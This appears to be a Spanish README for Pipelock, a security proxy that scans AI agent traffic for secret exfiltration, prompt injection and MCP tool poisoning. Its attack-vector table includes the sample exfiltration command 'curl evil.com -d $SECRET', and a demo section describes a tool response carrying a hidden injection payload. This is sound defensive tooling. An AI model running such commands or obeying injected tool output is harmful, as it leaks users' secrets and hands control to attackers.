- **[LangGraph](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/langgraph.md):** `MultiServerMCPClient`, `StateGraph`
- **[Hermes](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/hermes.md):** Cobertura completa de plugin o envoltura más ligera solo MCP para el agente de Nous Research, con preservación de sidecar de cabecera de autenticación
- **[JetBrains/Junie](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/jetbrains.md):** Envoltura del proxy MCP para IntelliJ, PyCharm, GoLand ([walkthrough](https://pipelab.org/learn/jetbrains-integration/))
- **Cursor:** `pipelock cursor install` registra Pipelock como un hook de Cursor para ejecución de shell, llamadas a herramientas MCP y lecturas de archivos; usa `--config` para incrustar una ruta de política validada y `pipelock cursor remove` para eliminar los hooks gestionados por Pipelock. También puedes usar `configs/cursor.yaml` con el mismo patrón de proxy MCP que [Claude Code](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/claude-code.md) ([walkthrough](https://pipelab.org/learn/cursor-integration/))
- **VS Code:** `pipelock vscode install` reescribe `.vscode/mcp.json` para enrutar cada servidor MCP a través del proxy MCP; `--global` apunta al `mcp.json` a nivel de usuario
- **[OpenClaw](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/openclaw.md):** sidecar de puerta de enlace, contenedor de inicio, envoltura de configuración
- **Cualquier otro cliente MCP:** `pipelock generate mcporter` lee cualquier archivo JSON con un objeto `mcpServers` de nivel superior y envuelve cada servidor a través del proxy de Pipelock, de modo que un cliente que no esté en la lista anterior aún se enrute a través del escaneo en un solo comando.
---
## Despliegue```bash
# Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest
docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro \
ghcr.io/luckypipewrench/pipelock:latest \
run --config /config/pipelock.yaml --listen 0.0.0.0:8888
# Network-isolated agent with Docker Compose
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up
# Kubernetes with Helm
helm install pipelock charts/pipelock/
Recetas de producción para Docker Compose, Kubernetes sidecar + NetworkPolicy, iptables/nftables y macOS PF: docs/guides/deployment-recipes.md
La acción descarga un binario precompilado, ejecuta `pipelock audit`, escanea el diff del PR en busca de secretos filtrados y sube el informe de auditoría como un artefacto del flujo de trabajo. Consulta [`examples/ci-workflow.yaml`](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/ci-workflow.yaml) para un flujo de trabajo completo.
### Demo Ejecutable: Inyección de Respuesta de Herramienta
El entorno [`examples/tool-response-injection/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/tool-response-injection/) ejecuta una demo de extremo a extremo donde una herramienta MCP con un nombre y descripción inofensivos oculta una carga útil de inyección de prompt en su respuesta. Pipelock bloquea la respuesta antes de que llegue al agente y emite recibos de acción firmados que un tercero puede verificar. La misma demo se ejecuta contra tres transportes con una clave de firma compartida:
- MCP stdio
- MCP HTTP upstream
- HTTP fetch```bash
cd examples/tool-response-injection
python3 demo.py # needs python3 + cryptography + pipelock on PATH
Detección que puedes extender, compartir y distribuir más rápido que el binario principal.
La detección integrada de DLP, inyección y envenenamiento de herramientas de Pipelock es potente desde el primer momento. Los paquetes de reglas comunitarias te permiten ir más allá: agrega tus propios patrones para las formas de exfiltración, formatos de secretos y trucos de inyección que tu pila ve, fírmalos y distribúyelos en un ritmo que tú controlas en lugar de esperar una versión.
Instala el paquete oficial en una línea:```bash pipelock rules install pipelock-community
Los paquetes de reglas están firmados y bloqueados por versión. El ciclo de vida completo es un comando enviado, no una edición de configuración:```bash
pipelock rules list # what is installed
pipelock rules diff pipelock-community # what a new version would change
pipelock rules update pipelock-community
pipelock rules verify # confirm signatures against the trusted keyring
pipelock rules remove pipelock-community
Escribe tu propia. Una regla es una entrada YAML pequeña con un nombre, una categoría (DLP, inyección o tool-poison) y un patrón. Fírmala con tu clave, colócala en un paquete, y cada instancia de Pipelock que ejecutes la recogerá. Compártela con la comunidad y protege a todos los demás también.
Contribuye con una regla al paquete público pipelock-rules, o lee docs/rules.md para construir y firmar tu propia.
Directorio completo de documentación: docs/
cmd/pipelock/ CLI entry point
internal/
cli/ 60+ Cobra commands (run, check, init, generate, mcp, session, posture, rules, ...)
diag/ pipelock doctor and install-verification diagnostics
session/ pipelock session, pipelock adaptive, and pipelock baseline operator CLIs
setup/ pipelock init sidecar: companion-proxy manifest generation (K8s)
config/ YAML config, validation, defaults, hot-reload (fsnotify)
scanner/ Ordered URL scanning pipeline + response injection detection
audit/ Structured JSON logging (zerolog) + event emission dispatch
proxy/ HTTP proxy: fetch, forward (CONNECT), WebSocket, DNS pinning, TLS
mcp/ MCP proxy + bidirectional scanning + tool poisoning + chains
integrity/ MCP binary/script integrity manifests and trust workflow
discover/ IDE/agent config discovery (Claude Code, Cursor, VS Code, JetBrains)
killswitch/ Emergency deny-all (6 sources) + port-isolated API
envelope/ Mediation envelope (RFC 8941) for sideband metadata
media/ Image metadata stripping (JPEG/PNG byte-level surgery)
normalize/ Text-normalization transforms (NFKC, invisible chars, leetspeak, whitespace, vowel-fold) for the scanner cascade
receipt/ Action receipt signing + hash-chained evidence
posture/ Posture capsule schema, signing, scoring, verify policy
session/ Session state, taint classification, task boundaries, trust overrides
rules/ Bundle loader, tier taxonomy, RequiredFeatures enforcement
sandbox/ Landlock, seccomp, netns, macOS sandbox-exec
shield/ Airlock, browser shield, SVG hardening
signing/ Ed25519 key management
integrity/ SHA256 file integrity monitoring
report/ HTML/JSON audit report generation
enterprise/ Multi-agent features (ELv2)
sdk/conformance/ Cross-implementation receipt verification test vectors
charts/ Helm chart for Kubernetes deployment
configs/ 7 built-in preset config files
docs/ Guides, references, compliance mappings
---
## Pruebas
Pipelock es probado como un producto de seguridad. El núcleo de código abierto tiene pruebas unitarias, de integración y de extremo a extremo. Una suite adversarial privada separada ejercita clases de ataque contra el binario de producción. Cada bypass se convierte en una prueba de regresión antes del lanzamiento.
| Métrica | Valor |
|--------|-------|
| Pruebas de Go (con `-race`) | Rutas unitarias, de integración y de extremo a extremo |
| Puerta de cobertura (codecov) | 91% proyecto principal Apache-2.0, 95% parche en código nuevo |
| Cobertura de evasión | Matriz pública de resistencia a bypass + corpus adversarial privado |
| Sobrecarga de ruta crítica del escáner | ~40us por escaneo de URL (benchmark de ruta crítica; ver [docs/performance.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/performance.md)) |
| Matriz de CI | Go 1.25 + 1.26, CodeQL, golangci-lint |
| Cadena de suministro | Procedencia SLSA, SBOM CycloneDX, firmas cosign |
Ejecute `make test` para verificar localmente. Benchmark independiente: el corpus público [agent-egress-bench](https://github.com/luckyPipewrench/agent-egress-bench). Ver los [resultados en vivo](https://pipelab.org/gauntlet/).
---
## Créditos
- Arquitectura influenciada por [el sandboxing de Claude Code de Anthropic](https://www.anthropic.com/engineering/claude-code-sandboxing) y [sandbox-runtime](https://github.com/anthropic-experimental/sandbox-runtime)
- Modelo de amenazas informado por [OWASP Agentic AI Top 10](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)
- Ver [docs/comparison.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/comparison.md) para cómo se relaciona Pipelock con otras herramientas en este espacio
- Contribuciones de revisión de seguridad de Dylan Corrales
Se aceptan contribuciones. Ver [CONTRIBUTING.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/CONTRIBUTING.md) para pautas.
Si Pipelock es útil, por favor [marque este repositorio con estrella](https://github.com/luckyPipewrench/pipelock). Ayuda a otros a encontrar el proyecto.
---
## Licencia
El núcleo de Pipelock tiene licencia bajo la **Apache License 2.0**. Derechos de autor 2026 Joshua Waldrep.
Las características multi-agente (identidad por agente, presupuestos y aislamiento de configuración) están en el directorio `enterprise/`, controladas por la etiqueta de compilación `enterprise` y tienen licencia bajo la **Elastic License 2.0 (ELv2)**. Estas características se activan con una clave de licencia válida.
El núcleo de código abierto funciona de forma independiente sin características de pago. Todo el escaneo, detección y protección de un solo agente es gratuito.
Los artefactos de lanzamiento precompilados (Homebrew, lanzamientos de GitHub, imágenes Docker) incluyen código de nivel de pago que se activa con una clave de licencia válida. Compilar desde el código fuente con `go install` o el `Dockerfile` del repositorio produce un binario solo para la Comunidad.
Ver [LICENSE](https://github.com/luckypipewrench/pipelock/blob/HEAD/LICENSE) para el texto de Apache 2.0 y [enterprise/LICENSE](https://github.com/luckypipewrench/pipelock/blob/HEAD/enterprise/LICENSE) para el texto de ELv2.
| Modo | Seguridad | Navegación Web | Caso de Uso |
|---|
| estricto | Solo lista permitida | Ninguna | Industrias reguladas, alta seguridad |
| equilibrado | Bloquea ingenuos + detecta sofisticados | Mediante fetch o proxy de reenvío | La mayoría de los desarrolladores (predeterminado) |
| auditoría | Solo registro | Sin restricciones | Evaluación antes de la aplicación |
| Vector de Ataque | Estricto | Equilibrado | Auditoría |
|---|
curl evil.com -d $SECRET | Prevenido | Prevenido | Registrado |
| Secreto en parámetros de consulta de URL | Prevenido | Detectado por DLP | Registrado |
| Secreto codificado en Base64 en URL | Prevenido | Detectado por entropía y DLP decodificado | Registrado |
| Túnel DNS | Prevenido | Detectado por entropía de subdominio | Registrado |
| Exfiltración por fragmentos | Prevenido | Detectado por comprobaciones de tasa, presupuesto y fragmentos | Registrado |
| Blob cifrado con clave pública en URL | Prevenido | Registrado cuando la entropía lo señala | Registrado |
| Característica | Pipelock | Escáneres (agent-scan) | Sandboxes (srt) | Agentes de kernel (agentsh) |
|---|
| Prevención de exfiltración de secretos | Estricto bloquea; equilibrado detecta | Parcial (modo proxy) | Parcial (a nivel de dominio) | Sí |
| DLP + análisis de entropía | Sí | No | No | Parcial |
| Detección de inyección de indicaciones | Sí | Sí | No | No |
| Escaneo MCP (bidireccional + envenenamiento de herramientas) | Sí | Sí | No | No |
| Proxy WebSocket (escaneo de tramas) | Sí | No | No | No |
| Transporte HTTP MCP (HTTP transmisible) | Sí | No | No | No |
| Interruptor de apagado de emergencia (6 fuentes) | Sí | No | No | No |
| Detección de cadenas de llamadas a herramientas | Sí | No | No | No |
| Sandbox de procesos (sin Docker) | Sí | No | No | Sí (a nivel de kernel) |
| Binario único, cero dependencias | Sí | No (Python) | No (npm) | No (kernel) |
| Amenaza | Cobertura |
|---|
| ASI01 Secuestro del Objetivo del Agente | Fuerte: MCP bidireccional + escaneo de respuestas |
| ASI02 Uso Indebido de Herramientas | Parcial: proxy como herramienta controlada, escaneo MCP |
| ASI03 Abuso de Identidad y Privilegios | Fuerte: separación de capacidades + protección SSRF |
| ASI04 Vulnerabilidades de la Cadena de Suministro | Parcial: monitoreo de integridad + escaneo MCP |
| ASI05 Ejecución de Código Inesperada | Moderado: aprobación HITL, valores predeterminados de fallo-cerrado |
| ASI06 Envenenamiento de Memoria y Contexto | Moderado: detección de inyección + propagación de mancha de sesión |
| ASI07 Comunicación Insegura entre Agentes | Parcial: escaneo MCP/A2A, ID de agente, integridad, firma |
| ASI08 Fallos en Cascada | Moderado: arquitectura de fallo-cerrado, limitación de tasa |
| ASI09 Explotación de Confianza Humano-Agente | Parcial: modos HITL, registro de auditoría |
| ASI10 Agentes Maliciosos | Fuerte: lista permitida de dominios + limitación de tasa + separación de capacidades |
Detalles, ejemplos de configuración y análisis de brechas: docs/owasp-mapping.md
<pl:aws-access-key:1> en argumentos HTTP, WebSocket y MCP tools/call. Los recibos registran el perfil activo y los recuentos por clase en lugar de secretos en texto plano.pipelock explain <url> (también explain event <id> y explain mcp) imprime el escáner, la capa, la regla de coincidencia, la superficie inspeccionada y el control de configuración más específico disponible para un falso positivo. Consulte docs/cli/explain.md.pipelock canary genera configuración de honeytoken. Un secreto sintético que aparece en el tráfico saliente demuestra que un agente o algo en su cadena está exfiltrando variables de entorno. Consulte tokens canario.pipelock skill-scan inventaria los archivos de habilidades del agente, los compara con un archivo de bloqueo propiedad del operador y marca combinaciones de origen a destino, como credencial a destino de red o shell a escritura, con evidencia de línea antes de que se ejecute algo. Consulte docs/cli/skill-scan.md.| Documento | ¿Qué contiene? |
|---|
| Referencia de Configuración | Todos los campos de configuración, valores por defecto, comportamiento de recarga en caliente, ajustes predefinidos |
| Política de Solicitudes | Guías de denegar/advertir por defecto permitido en operaciones de API salientes (GraphQL / discriminador / lote), fallo cerrado (v2.6) |
| Redacción de Solicitudes | Reescritura de solicitudes JSON a través de transporte HTTP, WebSocket y MCP |
| Ajuste de Falsos Positivos | Identificar, suprimir y ajustar hallazgos del escáner |
| API de Escaneo | Punto final de evaluación para escaneo programático |
| Recetas de Despliegue | Docker Compose, sidecar K8s, iptables, macOS PF |
pipelock doctor | Diagnósticos de despliegue configurado vs. aplicable para proxy, TLS, MCP, file_sentry, telemetría y señales de contención |
pipelock dashboard | Configuración del panel del operador: modos de autenticación, permisos RBAC, evidencia, exenciones, presupuestos, confianza y claves, vistas de flota, copia de seguridad/restauración y certificados de cobertura |
pipelock verify-install | Escaneo determinista, prueba local y comprobaciones de humo de egreso directo |
pipelock update | Autoactualización verificada: manifiesto de versión firmado, verificación de suma de comprobación, verificación cruzada opcional con cosign, instalación atómica, reversión |
| Resistencia a Bypass | Técnicas de evasión conocidas, mitigaciones, limitaciones |
| Ataques Conocidos Bloqueados | Ataques reales con fragmentos de reproducción |
| Integración SIEM | Esquema de registros, salida CEF/syslog, reenvío Enterprise duradero, ciclo de vida, métricas, consultas SIEM |
| Referencia de Métricas | Familias de métricas Prometheus, etiquetas, estadísticas JSON y reglas de alerta |
| Reglas de la Comunidad | Instalar, configurar y crear paquetes de reglas firmados |
| Garantía de Seguridad | Modelo de seguridad, límites de confianza, cadena de suministro |
| Documentos de Seguridad | Política de divulgación, rutas no soportadas, rotación de claves, modelos de amenaza TLS CA y Audit Packet |
| Preparación Empresarial | Controles empresariales incluidos, ruta de evaluación, decisiones de despliegue y límites explícitos |
| Construcciones Reproducibles | Verificación binaria byte por byte OSS, entradas estables, integración de versiones y alcance |
| Supresión de Hallazgos | Nombres de reglas, coincidencia de rutas, comentarios en línea |
| Modos de Transporte | Todos los modos proxy y sus capacidades de escaneo |
| OWASP MCP Top 10 | Cobertura de OWASP MCP Top 10 |
| OWASP Agentic Top 15 | Cobertura de OWASP Agentic AI Top 15 |
| OWASP LLM Top 10 | Cobertura de OWASP Top 10 for LLM Applications (2025) |
| EU AI Act | Mapeo de cumplimiento de la EU AI Act |
| NIST 800-53 | Mapeo de controles NIST SP 800-53 Rev. 5 |
| Mapeo Assess | Mapa de controles en tiempo de ejecución a los marcos contra los cuales pipelock assess produce evidencia, para revisión de adquisiciones y auditoría |
| Especificación de Política v0.1 | Formato de política de firewall de agente portátil |
| Sobre de Mediación | Cabeceras de metadatos de banda lateral, configuración, interacción con recibos |
| Política de Medios | Eliminación de esteganografía, endurecimiento SVG, tipos permitidos, límites de tamaño |
| Terminología de Evidencia | Referencia rápida para ActionReceipt, EvidenceReceipt, grabadora de vuelo, puntos de control, anclas, certificados de cobertura y Audit Packets, con las distinciones integridad-vs-completitud y fijado-vs-no fijado |
| Verificación de Recibos | pipelock verify-receipt, verificación de Informe de Recibos de Flota, pipelock-verifier independiente, suite de conformidad, integridad de cadena |
| Perfiles de Especificación de Recibos | Predicado de atestación in-toto para recibos de acción, con perfiles complementarios SCITT y AARP y mapeo de arte previo |
| Modelo de Amenaza de Audit Packet | Lo que los Audit Packets verificados prueban, lo que no prueban y las suposiciones de confianza que las partes dependientes deben fijar |
| Cobertura de Transporte de Recibos | Matriz de emisión de recibos a través de rutas fetch, forward, CONNECT/TLS, WebSocket, MCP y A2A |
| Learn-and-Lock | Contratos de comportamiento por agente: observar, compilar, sombrear, ratificar, promover (v2.4) |
| Federación | Verificación de sobre de mediación entrante, formato de actor SPIFFE, directorio bien conocido RFC 9421 (v2.4) |
| Cabecera de Razón de Bloqueo | Esquema X-Pipelock-Block-Reason, vocabulario de razones, sugerencias de reintento (v2.4) |
| Punto Final de Salud | Detección de cuña /health 503, latidos de subsistemas, configuración del panel del operador (v2.4) |
| Contención de Host | pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh para contención de coincidencia de propietario nftables de 3-UID con atestación de postura observada por el kernel (v2.5) |
| Manifiestos de Integridad MCP | Generar, verificar, firmar y requerir manifiestos de integridad binaria MCP de confianza (v2.5) |
| CLI Adaptativo | Inspeccionar y vaciar el estado de ejecución de la aplicación adaptativa a través de la API de administración (v2.5) |
| Conductor | El plano de control de flota Enterprise: distribución de políticas, sumidero de auditoría, eliminación remota, reversión, confianza mTLS/SPIFFE, licencias (v2.7, Enterprise) |
| Manual del Operador de Conductor | Recorrido práctico de flota local: arranque, servir, firmar un lote, verificar sin conexión |
| Inicio Rápido del Operador de Conductor | De cero a una auditoría de flota de solo lectura: licencia, certificado mTLS del operador, token de auditor, comandos de solo lectura |
| Despliegue Empresarial en Kubernetes | Flota Conductor basada en Helm: plano de control, seguidores, sumidero de flota, Secretos PKI, NetworkPolicies |
pipelock license | Instalar, inspeccionar y verificar la licencia que desbloquea funciones de pago (Pro agents, Enterprise fleet) |
pipelock baseline | Inspeccionar, ratificar y reaprender perfiles de línea base de comportamiento a través de la API de administración autenticada |
| Cápsula de Postura | Instantáneas de postura firmadas, CLI posture verify, puerta CI, modelo de puntuación |
pipelock init sidecar | Generar manifiestos de proxy acompañante Kubernetes forzados y contratos de lanzador MCP (merge estratégico, Kustomize, valores Helm) |
pipelock session | CLI del operador para inspección y recuperación de esclusa de aire (listar, inspeccionar, explicar, liberar, terminar, recuperar) |
pipelock keys status | Inventario unificado de claves de firma: fuente por propósito, presencia, legibilidad, validez y huella digital de clave pública |
| Grabadora de Vuelo | Registro de evidencia firmado con cadena hash: comportamiento activado por defecto, sello raíz de transcripción, redacción, depósito en garantía, rotación de claves |
| Intercepción TLS | MITM de túnel CONNECT: configuración de CA, escaneo de cuerpo/cabecera/respuesta, dominios de paso |
| Tokens de Señuelo | Secretos sintéticos que activan una alerta en el momento en que un agente intenta exfiltrar uno |
| Integración de Detección | Alimentar decisiones y evidencia de Pipelock en tuberías de detección / SIEM externas |
| Revisión de PR | Revisión de seguridad AI activada manualmente para pull requests (comentario /review) |
| Frontal del Inspector MCP | Enrutar herramientas de desarrollo MCP (Inspector, servidores de prueba) a través del escaneo de Pipelock |
pipelock demo | Escenarios de ataque autocontenidos con recibos firmados y verificables sin conexión, sin necesidad de configuración ni red |
| Insignias | Markdown listo para usar para la insignia scanned by pipelock en proyectos descendentes |